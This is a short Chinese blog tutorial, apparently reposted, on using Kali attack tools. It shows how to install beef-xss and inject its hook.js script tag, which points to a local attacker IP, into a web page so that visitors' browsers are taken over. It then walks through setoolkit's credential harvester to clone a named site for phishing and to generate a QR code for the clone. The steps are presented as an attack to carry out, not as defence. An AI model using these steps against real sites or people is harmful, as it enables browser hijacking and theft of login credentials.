本文转自行云博客https://www.xy586.top

beef-xss

安装beef-xss：apt install beef-xss
安装完成之后运行beef-xss：

登录网址：http://192.168.232.138:3000/ui/authentication

将beef-xss生成的js代码，放入网站中
<script src="http://192.168.232.138:3000/hook.js"></script>
被攻击目标打开网页链接，则beef中得到该电脑控制

setoolkit：

kali自带setoolkit，终端直接输入setoolkit运行
选择1

接着选择2，web攻击：

选择3）credential harvester attack method：

选择2）site cloner：

IP默认，克隆网站：http://www.51bb0.cn

登录IP，克隆成功

还可使用setoolkit将网页URL生成二维码，
选择8）QRCode Generator Attack Vectors：

输入网址：www.51bbO.cn生成二维码

在/root/.set/reports文件夹下，将生成的二维码导出：
sz qrcode_attack.png